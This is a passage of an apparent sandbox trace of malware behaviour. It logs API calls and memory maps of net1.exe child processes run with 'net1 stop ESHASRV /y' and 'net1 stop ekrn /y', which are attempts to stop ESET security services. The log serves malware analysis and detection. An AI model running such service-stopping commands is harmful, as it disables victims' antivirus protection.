"c:\\windows\\system32\\samcli.dll") Region: id = 14072 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14073 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14074 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14075 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14076 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14077 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14078 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14079 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14080 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14081 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14082 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14083 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14084 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 962 os_tid = 0xd40 [0123.916] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcf7d0 | out: lpSystemTimeAsFileTime=0xcf7d0*(dwLowDateTime=0xfefbe6b0, dwHighDateTime=0x1d48689)) [0123.916] GetCurrentProcessId () returned 0xd60 [0123.916] GetCurrentThreadId () returned 0xd40 [0123.916] GetTickCount () returned 0x289a8 [0123.916] QueryPerformanceCounter (in: lpPerformanceCount=0xcf7d8 | out: lpPerformanceCount=0xcf7d8*=1817083400000) returned 1 [0123.917] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.917] __set_app_type (_Type=0x1) [0123.917] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.917] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.917] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.917] GetConsoleOutputCP () returned 0x1b5 [0123.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.918] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.919] sprintf_s (in: _DstBuf=0xcf778, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.919] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.921] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.921] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0123.921] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf510, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.921] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.921] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf768 | out: Buffer=0xcf768*=0x164d40) returned 0x0 [0123.921] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcf768 | out: Buffer=0xcf768*=0x16c0e0) returned 0x0 [0123.921] _fileno (_File=0x7fefdba2a80) returned 0 [0123.921] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.921] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.921] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.921] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.921] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.921] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.921] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.921] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.921] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.921] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.921] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.921] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.921] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.921] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.921] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.922] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.922] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.922] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.922] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.922] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.922] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.922] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.922] _wcsicmp (_String1="accounts", _String2="ESHASRV") returned -4 [0123.922] _wcsicmp (_String1="computer", _String2="ESHASRV") returned -2 [0123.922] _wcsicmp (_String1="config", _String2="ESHASRV") returned -2 [0123.922] _wcsicmp (_String1="continue", _String2="ESHASRV") returned -2 [0123.922] _wcsicmp (_String1="cont", _String2="ESHASRV") returned -2 [0123.922] _wcsicmp (_String1="file", _String2="ESHASRV") returned 1 [0123.922] _wcsicmp (_String1="files", _String2="ESHASRV") returned 1 [0123.922] _wcsicmp (_String1="group", _String2="ESHASRV") returned 2 [0123.922] _wcsicmp (_String1="groups", _String2="ESHASRV") returned 2 [0123.922] _wcsicmp (_String1="help", _String2="ESHASRV") returned 3 [0123.922] _wcsicmp (_String1="helpmsg", _String2="ESHASRV") returned 3 [0123.922] _wcsicmp (_String1="localgroup", _String2="ESHASRV") returned 7 [0123.922] _wcsicmp (_String1="pause", _String2="ESHASRV") returned 11 [0123.922] _wcsicmp (_String1="session", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="sessions", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="sess", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="share", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="start", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="stats", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="statistics", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="stop", _String2="ESHASRV") returned 14 [0123.922] _wcsicmp (_String1="time", _String2="ESHASRV") returned 15 [0123.922] _wcsicmp (_String1="user", _String2="ESHASRV") returned 16 [0123.922] _wcsicmp (_String1="users", _String2="ESHASRV") returned 16 [0123.922] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0123.922] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0123.922] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0123.922] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0123.922] _wcsicmp (_String1="netpopup", _String2="ESHASRV") returned 9 [0123.922] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0123.922] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0123.922] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0123.922] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0123.922] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0123.922] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0123.922] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0123.922] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0123.923] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0123.923] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0123.923] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0123.923] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0123.923] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0123.923] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0123.923] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0123.923] _wcsupr (in: _String="ESHASRV" | out: _String="ESHASRV") returned="ESHASRV" [0123.923] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x16cdf0 [0123.926] GetServiceKeyNameW (in: hSCManager=0x16cdf0, lpDisplayName="ESHASRV", lpServiceName=0xff285750, lpcchBuffer=0xcf688 | out: lpServiceName="", lpcchBuffer=0xcf688) returned 0 [0123.928] _wcsicmp (_String1="msg", _String2="ESHASRV") returned 8 [0123.928] _wcsicmp (_String1="messenger", _String2="ESHASRV") returned 8 [0123.928] _wcsicmp (_String1="receiver", _String2="ESHASRV") returned 13 [0123.928] _wcsicmp (_String1="rcv", _String2="ESHASRV") returned 13 [0123.928] _wcsicmp (_String1="redirector", _String2="ESHASRV") returned 13 [0123.928] _wcsicmp (_String1="redir", _String2="ESHASRV") returned 13 [0123.928] _wcsicmp (_String1="rdr", _String2="ESHASRV") returned 13 [0123.928] _wcsicmp (_String1="workstation", _String2="ESHASRV") returned 18 [0123.928] _wcsicmp (_String1="work", _String2="ESHASRV") returned 18 [0123.928] _wcsicmp (_String1="wksta", _String2="ESHASRV") returned 18 [0123.928] _wcsicmp (_String1="prdr", _String2="ESHASRV") returned 11 [0123.928] _wcsicmp (_String1="devrdr", _String2="ESHASRV") returned -1 [0123.928] _wcsicmp (_String1="lanmanworkstation", _String2="ESHASRV") returned 7 [0123.928] _wcsicmp (_String1="server", _String2="ESHASRV") returned 14 [0123.928] _wcsicmp (_String1="svr", _String2="ESHASRV") returned 14 [0123.928] _wcsicmp (_String1="srv", _String2="ESHASRV") returned 14 [0123.928] _wcsicmp (_String1="lanmanserver", _String2="ESHASRV") returned 7 [0123.928] _wcsicmp (_String1="alerter", _String2="ESHASRV") returned -4 [0123.928] _wcsicmp (_String1="netlogon", _String2="ESHASRV") returned 9 [0123.928] NetServiceControl (in: servername=0x0, service="ESHASRV", opcode=0x0, arg=0x0, bufptr=0xcf690 | out: bufptr=0xcf690) returned 0x889 [0123.929] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0123.929] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0123.930] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0123.931] GetFileType (hFile=0xb) returned 0x2 [0123.996] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf558 | out: lpMode=0xcf558) returned 1 [0123.996] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcf550, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0xcf550*=0x1e) returned 1 [0123.996] GetFileType (hFile=0xb) returned 0x2 [0123.997] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf558 | out: lpMode=0xcf558) returned 1 [0123.997] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf550, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0xcf550*=0x2) returned 1 [0123.997] _ultow (in: _Dest=0x889, _Radix=849344 | out: _Dest=0x889) returned="2185" [0123.997] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0123.997] GetFileType (hFile=0xb) returned 0x2 [0123.997] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf558 | out: lpMode=0xcf558) returned 1 [0123.998] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcf550, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0xcf550*=0x34) returned 1 [0123.998] GetFileType (hFile=0xb) returned 0x2 [0123.998] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcf558 | out: lpMode=0xcf558) returned 1 [0123.998] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcf550, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0xcf550*=0x2) returned 1 [0123.999] NetApiBufferFree (Buffer=0x164d40) returned 0x0 [0123.999] NetApiBufferFree (Buffer=0x16c0e0) returned 0x0 [0123.999] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ESHASRV /y" [0123.999] exit (_Code=2) Process: id = "403" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x70fa8000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "388" os_parent_pid = "0x6b4" cmd_line = "C:\\Windows\\system32\\net1 stop ekrn /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13921 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13922 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 13923 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 13924 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13925 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13926 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13927 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13928 start_va = 0xff260000 end_va = 0xff292fff entry_point = 0xff260000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13929 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13930 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13931 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 13932 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13933 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13934 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13935 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13936 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13937 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13938 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13939 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13940 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13941 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 13942 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 13943 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13944 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13945 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13946 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13947 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13948 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13949 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13950 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13951 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13952 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13953 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13954 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13955 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13956 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13957 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13958 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13987 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 963 os_tid = 0x440 [0123.553] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafef0 | out: lpSystemTimeAsFileTime=0xafef0*(dwLowDateTime=0xfec52710, dwHighDateTime=0x1d48689)) [0123.553] GetCurrentProcessId () returned 0xf38 [0123.553] GetCurrentThreadId () returned 0x440 [0123.553] GetTickCount () returned 0x28841 [0123.553] QueryPerformanceCounter (in: lpPerformanceCount=0xafef8 | out: lpPerformanceCount=0xafef8*=1817047200000) returned 1 [0123.554] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0123.554] __set_app_type (_Type=0x1) [0123.554] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0123.555] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0123.555] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.555] GetConsoleOutputCP () returned 0x1b5 [0123.555] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0123.555] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0123.756] sprintf_s (in: _DstBuf=0xafe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0123.756] setlocale (category=0, locale=".437") returned="English_United States.437" [0123.758] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0123.758] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0123.758] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ekrn /y" [0123.758] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xafc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0123.758] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0123.758] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafe88 | out: Buffer=0xafe88*=0x184d40) returned 0x0 [0123.758] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xafe88 | out: Buffer=0xafe88*=0x18c0e0) returned 0x0 [0123.758] _fileno (_File=0x7fefdba2a80) returned 0 [0123.758] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0123.758] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0123.758] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0123.758] _wcsicmp (_String1="config", _String2="stop") returned -16 [0123.758] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0123.759] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0123.759] _wcsicmp (_String1="file", _String2="stop") returned -13 [0123.759] _wcsicmp (_String1="files", _String2="stop") returned -13 [0123.759] _wcsicmp (_String1="group", _String2="stop") returned -12 [0123.759] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0123.759] _wcsicmp (_String1="help", _String2="stop") returned -11 [0123.759] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0123.759] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0123.759] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0123.759] _wcsicmp (_String1="session", _String2="stop") returned -15 [0123.759] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0123.759] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0123.759] _wcsicmp (_String1="share", _String2="stop") returned -12 [0123.759] _wcsicmp (_String1="start", _String2="stop") returned -14 [0123.759] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0123.759] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0123.759] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0123.759] _wcsicmp (_String1="accounts", _String2="ekrn") returned -4 [0123.759] _wcsicmp (_String1="computer", _String2="ekrn") returned -2 [0123.759] _wcsicmp (_String1="config", _String2="ekrn") returned -2 [0123.759] _wcsicmp (_String1="continue", _String2="ekrn") returned -2 [0123.759] _wcsicmp (_String1="cont", _String2="ekrn") returned -2 [0123.759] _wcsicmp (_String1="file", _String2="ekrn") returned 1 [0123.759] _wcsicmp (_String1="files", _String2="ekrn") returned 1 [0123.759] _wcsicmp (_String1="group", _String2="ekrn") returned 2 [0123.759] _wcsicmp (_String1="groups", _String2="ekrn") returned 2 [0123.759] _wcsicmp (_String1="help", _String2="ekrn") returned 3 [0123.759] _wcsicmp (_String1="helpmsg", _String2="ekrn") returned 3 [0123.759] _wcsicmp (_String1="localgroup", _String2="ekrn") returned 7 [0123.759] _wcsicmp (_String1="pause", _String2="ekrn") returned 11 [0123.759] _wcsicmp (_String1="session", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="sessions", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="sess", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="share", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="start", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="stats", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="statistics", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="stop", _String2="ekrn") returned 14 [0123.759] _wcsicmp (_String1="time", _String2="ekrn") returned 15 [0123.760] _wcsicmp (_String1="user", _String2="ekrn") returned 16 [0123.760] _wcsicmp (_String1="users", _String2="ekrn") returned 16 [0123.760] _wcsicmp (_String1="msg", _String2="ekrn") returned 8 [0123.760] _wcsicmp (_String1="messenger", _String2="ekrn") returned 8 [0123.760] _wcsicmp (_String1="receiver", _String2="ekrn") returned 13 [0123.760] _wcsicmp (_String1="rcv", _String2="ekrn") returned 13 [0123.760] _wcsicmp 